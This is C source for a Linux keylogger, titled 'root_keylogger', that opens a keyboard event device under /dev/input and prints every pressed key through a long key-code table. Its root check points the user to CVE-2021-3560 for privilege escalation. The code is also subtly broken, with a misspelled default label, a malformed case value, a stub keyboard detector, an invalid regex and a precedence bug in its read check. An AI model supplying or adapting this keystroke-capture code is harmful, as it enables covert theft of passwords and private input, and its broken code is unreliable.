#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <dirent.h>
#include <regex.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/input.h>
#include <linux/input-event-codes.h>

regex_t keyboard_re_1;
regex_t keyboard_re_2;
    
char* code_to_key(int code) {
    /*
     *      Covent integer event codes into strings corresponding to key pressed.
     */
    switch (code){
        case 0:
            return "[RESERVED]";
        case 1:
            return "[ESC]";
        case 2:
            return "1";
        case 3:
            return "2";
        case 4:
            return "3";
        case 5:
            return "4";
        case 6:
            return "5";
        case 7:
            return "6";
        case 8:
            return "7";
        case 9:
            return "8";
        case 10:
            return "9";
        case 11:
            return "0";
        case 12:
            return "-";
        case 13:
            return "=";
        case 14:
            return "[BACKSPACE]";
        case 15:
            return "[TAB]";
        case 16:
            return "Q";
        case 17:
            return "W";
        case 18:
            return "E";
        case 19:
            return "R";
        case 20:
            return "T";
        case 21:
            return "Y";
        case 22:
            return "U";
        case 23:
            return "I";
        case 24:
            return "O";
        case 25:
            return "P";
        case 26:
            return "{";
        case 27:
            return "}";
        case 28:
            return "[ENTER]\n";
        case 29:
            return "[LEFTCTRL]";
        case 30:
            return "A";
        case 31:
            return "S";
        case 32:
            return "D";
        case 33:
            return "F";
        case 34:
            return "G";
        case 35:
            return "H";
        case 36:
            return "J";
        case 37:
            return "K";
        case 38:
            return "L";
        case 39:
            return ";";
        case 40:
            return "'";
        case 41:
            return "`";
        case 42:
            return "[LEFTSHIFT]";
        case 43:
            return "\\";
        case 44:
            return "Z";
        case 45:
            return "X";
        case 46:
            return "C";
        case 47:
            return "V";
        case 48:
            return "B";
        case 49:
            return "N";
        case 50:
            return "M";
        case 51:
            return ",";
        case 52:
            return ".";
        case 53:
            return "/";
        case 54:
            return "[RIGHTSHIFT]";
        case 55:
            return "*";
        case 56:
            return "[LEFTALT]";
        case 57:
            return " ";
        case 58:
            return "[CAPSLOCK]";
        case 59:
            return "[F1]";
        case 60:
            return "[F2]";
        case 61:
            return "[F3]";
        case 62:
            return "[F4]";
        case 63:
            return "[F5]";
        case 64:
            return "[F6]";
        case 65:
            return "[F7]";
        case 66:
            return "[F8]";
        case 67:
            return "[F9]";
        case 68:
            return "[F10]";
        case 69:
            return "[NUMLOCK]";
        case 70:
            return "[SCROLLLOCK]";
        case 71:
            return "[KP7]";
        case 72:
            return "[KP8]";
        case 73:
            return "[KP9]";
        case 74:
            return "[KPMINUS]";
        case 75:
            return "[KP4]";
        case 76:
            return "[KP5]";
        case 77:
            return "[KP6]";
        case 78:
            return "[KPPLUS]";
        case 79:
            return "[KP1]";
        case 80:
            return "[KP2]";
        case 81:
            return "[KP3]";
        case 82:
            return "[KP0]";
        case 83:
            return "[KPDOT]";
        case 85:
            return "[ZENKAKUHANKAKU]";
        case 86:
            return "[102ND]";
        case 87:
            return "[F11]";
        case 88:
            return "[F12]";
        case 89:
            return "[RO]";
        case 90:
            return "[KATAKANA]";
        case 91:
            return "[HIRAGANA]";
        case 92:
            return "[HENKAN]";
        case 93:
            return "[KATAKANAHIRAGANA]";
        case 94:
            return "[MUHENKAN]";
        case 95:
            return "[KPJPCOMMA]";
        case 96:
            return "[KPENTER]\n";
        case 97:
            return "[RIGHTCTRL]";
        case 98:
            return "[KPSLASH]";
        case 99:
            return "[SYSRQ]";
        case 100:
            return "[RIGHTALT]";
        case 101:
            return "[LINEFEED]";
        case 102:
            return "[HOME]";
        case 103:
            return "[UP]";
        case 104:
            return "[PAGEUP]";
        case 105:
            return "[LEFT]";
        case 106:
            return "[RIGHT]";
        case 107:
            return "[END]";
        case 108:
            return "[DOWN]";
        case 109:
            return "[PAGEDOWN]";
        case 110:
            return "[INSERT]";
        case 111:
            return "[DELETE]";
        case 112:
            return "[MACRO]";
        case 113:
            return "[MUTE]";
        case 114:
            return "[VOLUMEDOWN]";
        case 115:
            return "[VOLUMEUP]";
        case 116:
            return "[POWER]";
        case 117:
            return "[KPEQUAL]";
        case 118:
            return "[KPPLUSMINUS]";
        case 119:
            return "[PAUSE]";
        case 120:
            return "[SCALE]";
        case 121:
            return "[KPCOMMA]";
        case 122:
            return "[HANGEUL]";
        case 123:
            return "[HANJA]";
        case 124:
            return "[YEN]";
        case 125:
            return "[LEFTMETA]";
        case 126:
            return "[RIGHTMETA]";
        case 127:
            return "[COMPOSE]";
        case 128:
            return "[STOP]";
        case 129:
            return "[AGAIN]";
        case 130:
            return "[PROPS]";
        case 131:
            return "[UNDO]";
        case 132:
            return "[FRONT]";
        case 133:
            return "[COPY]";
        case 134:
            return "[OPEN]";
        case 135:
            return "[PASTE]";
        case 136:
            return "[FIND]";
        case 137:
            return "[CUT]";
        case 138:
            return "[HELP]";
        case 139:
            return "[MENU]";
        case 140:
            return "[CALC]";
        case 141:
            return "[SETUP]";
        case 142:
            return "[SLEEP]";
        case 143:
            return "[WAKEUP]";
        case 144:
            return "[FILE]";
        case 145:
            return "[SENDFILE]";
        case 146:
            return "[DELETEFILE]";
        case 147:
            return "[XFER]";
        case 148:
            return "[PROG1]";
        case 149:
            return "[PROG2]";
        case 150:
            return "[WWW]";
        case 151:
            return "[MSDOS]";
        case 152:
            return "[COFFEE]";
        case 153:
            return "[ROTATE_DISPLAY]";
        case 154:
            return "[CYCLEWINDOWS]";
        case 155:
            return "[MAIL]";
        case 156:
            return "[BOOKMARKS]";
        case 157:
            return "[COMPUTER]";
        case 158:
            return "[KY_BACK]";
        case 159:
            return "[FORWARD]";
        case 160:
            return "[CLOSECD]";
        case 161:
            return "[EJECTCD]";
        case 162:
            return "[EJECTCLOSECD]";
        case 163:
            return "[NEXTSONG]";
        case 164:
            return "[PLAYPAUSE]";
        case 165:
            return "[PREVIOUSSONG]";
        case 166:
            return "[STOPCD]";
        case 167:
            return "[RECORD]";
        case 168:
            return "[REWIND]";
        case 169:
            return "[PHONE]";
        case 170:
            return "[ISO]";
        case 171:
            return "[CONFIG]";
        case 172:
            return "[HOMEPAGE]";
        case 173:
            return "[REFRESH]";
        case 174:
            return "[EXIT]";
        case 175:
            return "[MOVE]";
        case 176:
            return "[EDIT]";
        case 177:
            return "[SCROLLUP]";
        case 178:
            return "[SCROLLDOWN]";
        case 179:
            return "[KPLEFTPAREN]";
        case 180:
            return "[KPRIGHTPAREN]";
        case 181:
            return "[NEW]";
        case 182:
            return "[REDO]";
        case 183:
            return "[F13]";
        case 184:
            return "[F14]";
        case 185:
            return "[F15]";
        case 186:
            return "[F16]";
        case 187:
            return "[F17]";
        case 188:
            return "[F18]";
        case 189:
            return "[F19]";
        case 190:
            return "[F20]";
        case 191:
            return "[F21]";
        case 192:
            return "[F22]";
        case 193:
            return "[F23]";
        case 194:
            return "[F24]";
        case 200:
            return "[PLAYCD]";
        case 201:
            return "[PAUSECD]";
        case 202:
            return "[PROG3]";
        case 203:
            return "[PROG4]";
        case 204:
            return "[DASHBOARD]";
        case 205:
            return "[SUSPEND]";
        case 206:
            return "[CLOSE]";
        case 207:
            return "[PLAY]";
        case 208:
            return "[FASTFORWARD]";
        case 209:
            return "[BASSBOOST]";
        case 210:
            return "[PRINT]";
        case 211:
            return "[HP]";
        case 212:
            return "[CAMERA]";
        case 213:
            return "[SOUND]";
        case 214:
            return "[QUESTION]";
        case 215:
            return "[EMAIL]";
        case 216:
            return "[CHAT]";
        case 217:
            return "[SEARCH]";
        case 218:
            return "[CONNECT]";
        case 219:
            return "[FINANCE]";
        case 220:
            return "[SPORT]";
        case 221:
            return "[SHOP]";
        case 222:
            return "[ALTERASE]";
        case 223:
            return "[CANCEL]";
        case 224:
            return "[BRIGHTNESSDOWN]";
        case 225:
            return "[BRIGHTNESSUP]";
        case 226:
            return "[MEDIA]";
        case 227:
            return "[SWITCHVIDEOMODE]";
        case 228:
            return "[KBDILLUMTOGGLE]";
        case 229:
            return "[KBDILLUMDOWN]";
        case 230:
            return "[KBDILLUMUP]";
        case 231:
            return "[SEND]";
        case 232:
            return "[REPLY]";
        case 233:
            return "[FORWARDMAIL]";
        case 234:
            return "[SAVE]";
        case 235:
            return "[DOCUMENTS]";
        case 236:
            return "[BATTERY]";
        case 237:
            return "[BLUETOOTH]";
        case 238:
            return "[WLAN]";
        case 239:
            return "[UWB]";
        case 240:
            return "[UNKNOWN]";
        case 241:
            return "[VIDEO_NEXT]";
        case 242:
            return "[VIDEO_PREV]";
        case 243:
            return "[BRIGHTNESS_CYCLE]";
        case 244:
            return "[BRIGHTNESS_AUTO]";
        case 245:
            return "[DISPLAY_OFF]";
        case 246:
            return "[WWAN]";
        case 247:
            return "[RFKILL]";
        case 248:
            return "[MICMUTE]";
        case 0x100:
            return "[BTN_0]";
        case 0x101:
            return "[BTN_1]";
        case 0x102:
            return "[BTN_2]";
        case 0x103:
            return "[BTN_3]";
        case 0x104:
            return "[BTN_4]";
        case 0x105:
            return "[BTN_5]";
        case 0x106:
            return "[BTN_6]";
        case 0x107:
            return "[BTN_7]";
        case 0x108:
            return "[BTN_8]";
        case 0x109:
            return "[BTN_9]";
        case 0x110:
            return "[BTN_LEFT]";
        case 0x111:
            return "[BTN_RIGHT]";
        case 0x112:
            return "[BTN_MIDDLE]";
        case 0x113:
            return "[BTN_SIDE]";
        case 0x114:
            return "[BTN_EXTRA]";
        case 0x115:
            return "[BTN_FORWARD]";
        case 0x116:
            return "[BTN_BACK]";
        case 0x117:
            return "[BTN_TASK]";
        case 0x120:
            return "[BTN_TRIGGER]";
        case 0x121:
            return "[BTN_THUMB]";
        case 0x122:
            return "[BTN_THUMB2]";
        case 0x123:
            return "[BTN_TOP]";
        case 0x124:
            return "[BTN_TOP2]";
        case 0x125:
            return "[BTN_PINKIE]";
        case 0x126:
            return "[BTN_BASE]";
        case 0x127:
            return "[BTN_BASE2]";
        case 0x128:
            return "[BTN_BASE3]";
        case 0x129:
            return "[BTN_BASE4]";
        case 0x12a:
            return "[BTN_BASE5]";
        case 0x12b:
            return "[BTN_BASE6]";
        case 0x12f:
            return "[BTN_DEAD]";
        case 0x130:
            return "[BTN_SOUTH]";
        case 0x131:
            return "[BTN_EAST]";
        case 0x132:
            return "[BTN_C]";
        case 0x133:
            return "[BTN_NORTH]";
        case 0x134:
            return "[BTN_WEST]";
        case 0x135:
            return "[BTN_Z]";
        case 0x136:
            return "[BTN_TL]";
        case 0x137:
            return "[BTN_TR]";
        case 0x138:
            return "[BTN_TL2]";
        case 0x139:
            return "[BTN_TR2]";
        case 0x13a:
            return "[BTN_SELECT]";
        case 0x13b:
            return "[BTN_START]";
        case 0x13c:
            return "[BTN_MODE]";
        case 0x13d:
            return "[BTN_THUMBL]";
        case 0x13e:
            return "[BTN_THUMBR]";
        case 0x140:
            return "[BTN_TOOL_PEN]";
        case 0x141:
            return "[BTN_TOOL_RUBBER]";
        case 0x142:
            return "[BTN_TOOL_BRUSH]";
        case 0x143:
            return "[BTN_TOOL_PENCIL]";
        case 0x144:
            return "[BTN_TOOL_AIRBRUSH]";
        case 0x145:
            return "[BTN_TOOL_FINGER]";
        case 0x146:
            return "[BTN_TOOL_MOUSE]";
        case 0x147:
            return "[BTN_TOOL_LENS]";
        case 0x148:
            return "[BTN_TOOL_QUINTTAP]";
        case 0x149:
            return "[BTN_STYLUS3]";
        case 0x14a:
            return "[BTN_TOUCH]";
        case 0x14b:
            return "[BTN_STYLUS]";
        case 0x14c:
            return "[BTN_STYLUS2]";
        case 0x14d:
            return "[BTN_TOOL_DOUBLETAP]";
        case 0x14e:
            return "[BTN_TOOL_TRIPLETAP]";
        case 0x14f:
            return "[BTN_TOOL_QUADTAP]";
        case 0x150:
            return "[BTN_GEAR_DOWN]";
        case 0x151:
            return "[BTN_GEAR_UP]";
        case 0x160:
            return "[OK]";
        case 0x161:
            return "[SELECT]";
        case 0x162:
            return "[GOTO]";
        case 0x163:
            return "[CLEAR]";
        case 0x164:
            return "[POWER2]";
        case 0x165:
            return "[OPTION]";
        case 0x166:
            return "[INFO]";
        case 0x167:
            return "[TIME]";
        case 0x168:
            return "[VENDOR]";
        case 0x169:
            return "[ARCHIVE]";
        case 0x16a:
            return "[PROGRAM]";
        case 0x16b:
            return "[CHANNEL]";
        case 0x16c:
            return "[FAVORITES]";
        case 0x16d:
            return "[EPG]";
        case 0x16e:
            return "[PVR]";
        case 0x16f:
            return "[MHP]";
        case 0x170:
            return "[LANGUAGE]";
        case 0x171:
            return "[TITLE]";
        case 0x172:
            return "[SUBTITLE]";
        case 0x173:
            return "[ANGLE]";
        case 0x174:
            return "[FULL_SCREEN]";
        case 0x175:
            return "[MODE]";
        case 0x176:
            return "[KEYBOARD]";
        case 0x177:
            return "[ASPECT_RATIO]";
        case 0x178:
            return "[PC]";
        case 0x179:
            return "[TV]";
        case 0x17a:
            return "[TV2]";
        case 0x17b:
            return "[VCR]";
        case 0x17c:
            return "[VCR2]";
        case 0x17d:
            return "[SAT]";
        case 0x17e:
            return "[SAT2]";
        case 0x17f:
            return "[CD]";
        case 0x180:
            return "[TAPE]";
        case 0x181:
            return "[RADIO]";
        case 0x182:
            return "[TUNER]";
        case 0x183:
            return "[PLAYER]";
        case 0x184:
            return "[TEXT]";
        case 0x185:
            return "[DVD]";
        case 0x186:
            return "[AUX]";
        case 0x187:
            return "[MP3]";
        case 0x188:
            return "[AUDIO]";
        case 0x189:
            return "[VIDEO]";
        case 0x18a:
            return "[DIRECTORY]";
        case 0x18b:
            return "[LIST]";
        case 0x18c:
            return "[MEMO]";
        case 0x18d:
            return "[CALENDAR]";
        case 0x18e:
            return "[RED]";
        case 0x18f:
            return "[GREEN]";
        case 0x190:
            return "[YELLOW]";
        case 0x191:
            return "[BLUE]";
        case 0x192:
            return "[CHANNELUP]";
        case 0x193:
            return "[CHANNELDOWN]";
        case 0x194:
            return "[FIRST]";
        case 0x195:
            return "[LAST]";
        case 0x196:
            return "[AB]";
        case 0x197:
            return "[NEXT]";
        case 0x198:
            return "[RESTART]";
        case 0x199:
            return "[SLOW]";
        case 0x19a:
            return "[SHUFFLE]";
        case 0x19b:
            return "[BREAK]";
        case 0x19c:
            return "[PREVIOUS]";
        case 0x19d:
            return "[DIGITS]";
        case 0x19e:
            return "[TEEN]";
        case 0x19f:
            return "[TWEN]";
        case 0x1a0:
            return "[VIDEOPHONE]";
        case 0x1a1:
            return "[GAMES]";
        case 0x1a2:
            return "[ZOOMIN]";
        case 0x1a3:
            return "[ZOOMOUT]";
        case 0x1a4:
            return "[ZOOMRESET]";
        case 0x1a5:
            return "[WORDPROCESSOR]";
        case 0x1a6:
            return "[EDITOR]";
        case 0x1a7:
            return "[SPREADSHEET]";
        case 0x1a8:
            return "[GRAPHICSEDITOR]";
        case 0x1a9:
            return "[PRESENTATION]";
        case 0x1aa:
            return "[DATABASE]";
        case 0x1ab:
            return "[NEWS]";
        case 0x1ac:
            return "[VOICEMAIL]";
        case 0x1ad:
            return "[ADDRESSBOOK]";
        case 0x1ae:
            return "[MESSENGER]";
        case 0x1af:
            return "[DISPLAYTOGGLE]";
        case 0x1b0:
            return "[SPELLCHECK]";
        case 0x1b1:
            return "[LOGOFF]";
        case 0x1b2:
            return "[DOLLAR]";
        case 0x1b3:
            return "[EURO]";
        case 0x1b4:
            return "[FRAMEBACK]";
        case 0x1b5:
            return "[FRAMEFORWARD]";
        case 0x1b6:
            return "[CONTEXT_MENU]";
        case 0x1b7:
            return "[MEDIA_REPEAT]";
        case 0x1b8:
            return "[10CHANNELSUP]";
        case 0x1b9:
            return "[10CHANNELSDOWN]";
        case 0x1ba:
            return "[IMAGES]";
        case 0x1bc:
            return "[NOTIFICATION_CENTER]";
        case 0x1bd:
            return "[PICKUP_PHONE]";
        case 0x1be:
            return "[HANGUP_PHONE]";
        case 0x1c0:
            return "[DEL_EOL]";
        case 0x1c1:
            return "[DEL_EOS]";
        case 0x1c2:
            return "[INS_LINE]";
        case 0x1c3:
            return "[DEL_LINE]";
        case 0x1d0:
            return "[FN]";
        case 0x1d1:
            return "[FN_ESC]";
        case 0x1d2:
            return "[FN_F1]";
        case 0x1d3:
            return "[FN_F2]";
        case 0x1d4:
            return "[FN_F3]";
        case 0x1d5:
            return "[FN_F4]";
        case 0x1d6:
            return "[FN_F5]";
        case 0x1d7:
            return "[FN_F6]";
        case 0x1d8:
            return "[FN_F7]";
        case 0x1d9:
            return "[FN_F8]";
        case 0x1da:
            return "[FN_F9]";
        case 0x1db:
            return "[FN_F10]";
        case 0x1dc:
            return "[FN_F11]";
        case 0x1dd:
            return "[FN_F12]";
        case 0x1de:
            return "[FN_1]";
        case 0x1df:
            return "[FN_2]";
        case 0x1e0:
            return "[FN_D]";
        case 0x1e1:
            return "[FN_E]";
        case 0x1e2:
            return "[FN_F]";
        case 0x1e3:
            return "[FN_S]";
        case 0x1e4:
            return "[FN_B]";
        case 0x1e5:
            return "[FN_RIGHT_SHIFT]";
        case 0x1f1:
            return "[BRL_DOT1]";
        case 0x1f2:
            return "[BRL_DOT2]";
        case 0x1f3:
            return "[BRL_DOT3]";
        case 0x1f4:
            return "[BRL_DOT4]";
        case 0x1f5:
            return "[BRL_DOT5]";
        case 0x1f6:
            return "[BRL_DOT6]";
        case 0x1f7:
            return "[BRL_DOT7]";
        case 0x1f8:
            return "[BRL_DOT8]";
        case 0x1f9:
            return "[BRL_DOT9]";
        case 0x1fa:
            return "[BRL_DOT10]";
        case 0x200:
            return "[NUMERIC_0]";
        case 0x201:
            return "[NUMERIC_1]";
        case 0x202:
            return "[NUMERIC_2]";
        case 0x203:
            return "[NUMERIC_3]";
        case 0x204:
            return "[NUMERIC_4]";
        case 0x205:
            return "[NUMERIC_5]";
        case 0x206:
            return "[NUMERIC_6]";
        case 0x207:
            return "[NUMERIC_7]";
        case 0x208:
            return "[NUMERIC_8]";
        case 0x209:
            return "[NUMERIC_9]";
        case 0x20a:
            return "[NUMERIC_STAR]";
        case 0x20b:
            return "[NUMERIC_POUND]";
        case 0x20c:
            return "[NUMERIC_A]";
        case 0x20d:
            return "[NUMERIC_B]";
        case 0x20e:
            return "[NUMERIC_C]";
        case 0x20f:
            return "[NUMERIC_D]";
        case 0x210:
            return "[CAMERA_FOCUS]";
        case 0x211:
            return "[WPS_BUTTON]";
        case 0x212:
            return "[TOUCHPAD_TOGGLE]";
        case 0x213:
            return "[TOUCHPAD_ON]";
        case 0x214:
            return "[TOUCHPAD_OFF]";
        case 0x215:
            return "[CAMERA_ZOOMIN]";
        case 0x216:
            return "[CAMERA_ZOOMOUT]";
        case 0x217:
            return "[CAMERA_UP]";
        case 0x218:
            return "[CAMERA_DOWN]";
        case 0x219:
            return "[CAMERA_LEFT]";
        case 0x21a:
            return "[CAMERA_RIGHT]";
        case 0x21b:
            return "[ATTENDANT_ON]";
        case 0x21c:
            return "[ATTENDANT_OFF]";
        case 0x21d:
            return "[ATTENDANT_TOGGLE]";
        case 0x21e:
            return "[LIGHTS_TOGGLE]";
        case 0x220:
            return "[BTN_DPAD_UP]";
        case 0x221:
            return "[BTN_DPAD_DOWN]";
        case 0x222:
            return "[BTN_DPAD_LEFT]";
        case 0x223:
            return "[BTN_DPAD_RIGHT]";
        case 0x230:
            return "[ALS_TOGGLE]";
        case 0x231:
            return "[ROTATE_LOCK_TOGGLE]";
        case 0x240:
            return "[BUTTONCONFIG]";
        case 0x241:
            return "[TASKMANAGER]";
        case 0x242:
            return "[JOURNAL]";
        case 0x243:
            return "[CONTROLPANEL]";
        case 0x244:
            return "[APPSELECT]";
        case 0x245:
            return "[SCREENSAVER]";
        case 0x246:
            return "[VOICECOMMAND]";
        case 0x247:
            return "[ASSISTANT]";
        case 0x248:
            return "[KBD_LAYOUT_NEXT]";
        case 0x250:
            return "[BRIGHTNESS_MIN]";
        case 0x251:
            return "[BRIGHTNESS_MAX]";
        case 0x260:
            return "[KBDINPUTASSIST_PREV]";
        case 0x261:
            return "[KBDINPUTASSIST_NEXT]";
        case 0x262:
            return "[KBDINPUTASSIST_PREVGROUP]";
        case 0x263:
            return "[KBDINPUTASSIST_NEXTGROUP]";
        case 0x264:
            return "[KBDINPUTASSIST_ACCEPT]";
        case 0x265:
            return "[KBDINPUTASSIST_CANCEL]";
        case 0x266:
            return "[RIGHT_UP]";
        case 0x267:
            return "[RIGHT_DOWN]";
        case 0x268:
            return "[LEFT_UP]";
        case 0x269:
            return "[LEFT_DOWN]";
        case 0x26a:
            return "[ROOT_MENU]";
        case 0x26b:
            return "[MEDIA_TOP_MENU]";
        case 0x26c:
            return "[NUMERIC_11]";
        case 0x26d:
            return "[NUMERIC_12]";
        case 0x26e:
            return "[AUDIO_DESC]";
        case 0x26f:
            return "[3D_MODE]";
        case 0x270:
            return "[NEXT_FAVORITE]";
        case 0x271:
            return "[STOP_RECORD]";
        case 0x272:
            return "[PAUSE_RECORD]";
        case 0x273:
            return "[VOD]";
        case 0x274:
            return "[UNMUTE]";
        case 0x275:
            return "[FASTREVERSE]";
        case 0x276:
            return "[SLOWREVERSE]";
        case 0x277:
            return "[DATA]";
        case 0x278:
            return "[ONSCREEN_KEYBOARD]";
        case 0x279:
            return "[PRIVACY_SCREEN_TOGGLE]";
        case 0x27a:
            return "[SELECTIVE_SCREENSHOT]";
        case 0x290:
            return "[MACRO1]";
        case 0x291:
            return "[MACRO2]";
        case 0x292:
            return "[MACRO3]";
        case 0x293:
            return "[MACRO4]";
        case 0x294:
            return "[MACRO5]";
        case 0x295:
            return "[MACRO6]";
        case 0x296:
            return "[MACRO7]";
        case 0x297:
            return "[MACRO8]";
        case 0x298:
            return "[MACRO9]";
        case 0x299:
            return "[MACRO10]";
        case 0x29a:
            return "[MACRO11]";
        case 0x29b:
            return "[MACRO12]";
        case 0x29c:
            return "[MACRO13]";
        case 0x29d:
            return "[MACRO14]";
        case 0x29e:
            return "[MACRO15]";
        case 0x29f:
            return "[MACRO16]";
        case 0x2a0:
            return "[MACRO17]";
        case 0x2a1:
            return "[MACRO18]";
        case 0x2a2:
            return "[MACRO19]";
        case 0x2a3:
            return "[MACRO20]";
        case 0x2a4:
            return "[MACRO21]";
        case 0x2a5:
            return "[MACRO22]";
        case 0x2a6:
            return "[MACRO23]";
        case 0x2a7:
            return "[MACRO24]";
        case 0x2a8:
            return "[MACRO25]";
        case 0x2a9:
            return "[MACRO26]";
        case 0x2aa:
            return "[MACRO27]";
        case 0x2ab:
            return "[MACRO28]";
        case 0x2ac:
            return "[MACRO29]";
        case 0x2ad:
            return "[MACRO30]";
        case 0x2b0:
            return "[MACRO_RECORD_START]";
        case 0x2b1:
            return "[MACRO_RECORD_STOP]";
        case 0x2b2:
            return "[MACRO_PRESET_CYCLE]";
        case 0x2b3:
            return "[MACRO_PRESET1]";
        case 0x2b4:
            return "[MACRO_PRESET2]";
        case 0x2b5:
            return "[MACRO_PRESET3]";
        case 0x2b8:
            return "[KBD_LCD_MENU1]";
        case 0x2b9:
            return "[KBD_LCD_MENU2]";
        case 0x2ba:
            return "[KBD_LCD_MENU3]";
        case 0x2bb:
            return "[KBD_LCD_MENU4]";
        case 0x2bc:
            return "[KBD_LCD_MENU5]";
        case 0x2c0:
            return "[BTN_TRIGGER_HAPPY1]";
        case 0x2c1:
            return "[BTN_TRIGGER_HAPPY2]";
        case 0x2c2:
            return "[BTN_TRIGGER_HAPPY3]";
        case 0x2c3:
            return "[BTN_TRIGGER_HAPPY4]";
        case 0x2c4:
            return "[BTN_TRIGGER_HAPPY5]";
        case 0x2c5:
            return "[BTN_TRIGGER_HAPPY6]";
        case 0x2c6:
            return "[BTN_TRIGGER_HAPPY7]";
        case 0x2c7:
            return "[BTN_TRIGGER_HAPPY8]";
        case 0x2c8:
            return "[BTN_TRIGGER_HAPPY9]";
        case 0x2c9:
            return "[BTN_TRIGGER_HAPPY10]";
        case 0x2ca:
            return "[BTN_TRIGGER_HAPPY11]";
        case 0x2cb:
            return "[BTN_TRIGGER_HAPPY12]";
        case 0x2cc:
            return "[BTN_TRIGGER_HAPPY13]";
        case 0x2cd:
            return "[BTN_TRIGGER_HAPPY14]";
        case 0x2ce:
            return "[BTN_TRIGGER_HAPPY15]";
        case 0x2cf:
            return "[BTN_TRIGGER_HAPPY16]";
        case 0x2d0:
            return "[BTN_TRIGGER_HAPPY17]";
        case 0x2d1:
            return "[BTN_TRIGGER_HAPPY18]";
        case 0x2d2:
            return "[BTN_TRIGGER_HAPPY19]";
        case 0x2d3:
            return "[BTN_TRIGGER_HAPPY20]";
        case 0x2d4:
            return "[BTN_TRIGGER_HAPPY21]";
        case 0x2d5:
            return "[BTN_TRIGGER_HAPPY22]";
        case 0x2d6:
            return "[BTN_TRIGGER_HAPPY23]";
        case 0x2d7:
            return "[BTN_TRIGGER_HAPPY24]";
        case 0x2d8:
            return "[BTN_TRIGGER_HAPPY25]";
        case 0x2d9:
            return "[BTN_TRIGGER_HAPPY26]";
        case 0x2da:
            return "[BTN_TRIGGER_HAPPY27]";
        case 0x2db:
            return "[BTN_TRIGGER_HAPPY28]";
        case 0x2dc:
            return "[BTN_TRIGGER_HAPPY29]";
        case 0x2dd:
            return "[BTN_TRIGGER_HAPPY30]";
        case 0x2de:
            return "[BTN_TRIGGER_HAPPY31]";
        case 0x2df:
            return "[BTN_TRIGGER_HAPPY32]";
        case 0x2e0:
            return "[BTN_TRIGGER_HAPPY33]";
        case 0x2e1:
            return "[BTN_TRIGGER_HAPPY34]";
        case 0x2e2:
            return "[BTN_TRIGGER_HAPPY35]";
        case 0x2e3:
            return "[BTN_TRIGGER_HAPPY36]";
        case 0x2e4:
            return "[BTN_TRIGGER_HAPPY37]";
        case 0x2e5:
            return "[BTN_TRIGGER_HAPPY38]";
        case 0x2e6:
            return "[BTN_TRIGGER_HAPPY39]";
        case 0x2e7E:
            return "[BTN_TRIGGER_HAPPY40]";
        deafult:
            return "[N/A]]";
    }
}

void listen_for_keyboard_events(int keyboard_fd) {
    /*
     *      While device is connected. Read keyboard events and print them to standard out.
     */
    int stop, bytes_read;
    struct input_event events[3]; // keyboard events travel in threes
    fd_set rdfs;
    
    // Set stdout to be unbuffered so when we print characters they are sent to the console 
    // immediately rather than having to wait for a newline
    setbuf(stdout, NULL);

    // set up fd set 
    FD_ZERO(&rdfs);
    FD_SET(keyboard_fd, &rdfs);

    while(1) {
        select(keyboard_fd+1, &rdfs,NULL,NULL,NULL);
        if ((bytes_read = read(keyboard_fd, events, sizeof(events)) == -1)) {
            break;
        }
        if (bytes_read % sizeof(struct input_event) != 0) {
            printf("[!] Error: Failed to read event. Got %d bytes, but expected %d.", bytes_read % sizeof(struct input_event), sizeof(struct input_event));
            exit(-1);
        }
        // will probably need to make this more sophisticated for 
        // held keys and shift/caps.
        for (int i = 0; i < 3; i++) {
            // if the event is a key state change other than a release.
            if (events[i].type == EV_KEY && events[i].value != 0) { 
                printf("%s", code_to_key(events[i].code)) ;
            }
        }
    }
    printf("[!] Error: Failed to read event from device. Has it been removed?\n");
    return;
}

int is_keyboard(struct dirent*) {
    /*
     *      Performs and ioctl call to get the name of the device and then parses 
     *      for substrings that indicate that the device is indeed a keyboard.
     */
    return 1;
}

int main(int argc, char** argv) {
    DIR* input_dir;
    struct dirent* current_file;
    struct stat stat_buff;
    char keyboard_file_path[267];
    int keyboard_fd;


    // check user is root
    if (geteuid() != 0) {
        printf("[!] Error: You are not root. Maybe try CVE-2021-3560 if your version of polkit is <= 0.113 or maybe use sudo...\n");
        exit(-1);
    }
    
    // get file path of the keyboard device
    if (argc > 2) {
        printf("Usage: root_keylogger [/dev/input/eventX]\n");
        exit(-1);
    }
    else if (argc == 1) {
        strncpy(keyboard_file_path,"/dev/input/",11);
        // compile regular expressions ready for calls to is_keyboard
        // may want to add a more rich set of regular expressions
        // or find out how to correctly enumerate keyboards?
        if (regcomp(&keyboard_re_1,"*keyboard*",REG_ICASE) || regcomp(&keyboard_re_2,"kbd",REG_ICASE)) {
            printf("[!] Error: Regular expressions failed to compile.\n");
            exit(-1);
        }
        // open /dev/inputs and iterate of character devices
        input_dir = opendir("/dev/input");
        while ((current_file = readdir(input_dir)) != NULL) {
            if (current_file->d_type == DT_CHR && is_keyboard(current_file)) {
                strncat(keyboard_file_path, current_file->d_name, 256); 
            }
        }
        closedir(input_dir);
    }
    else {
        if (stat(argv[1], &stat_buff) == -1) {
            printf("[!] Error: Device file %s does not exist. (%s)\n",argv[1],strerror(errno));
            exit(-1);
        }
        else if ((stat_buff.st_mode & S_IFMT) != S_IFCHR) {
            printf("[!] Error: File %s is not a character device.\n",argv[1]);
            exit(-1);
        }
        else {
            strncpy(keyboard_file_path, argv[1], 267);
        }
    }

    // get file descriptor to the character device and start listening for events
    if ((keyboard_fd = open(keyboard_file_path, O_RDONLY)) == -1) {
            printf("[!] Error: Could not open device %s.\n",argv[1]);
            exit(-1);
    }
    listen_for_keyboard_events(keyboard_fd);
    exit(0);
}

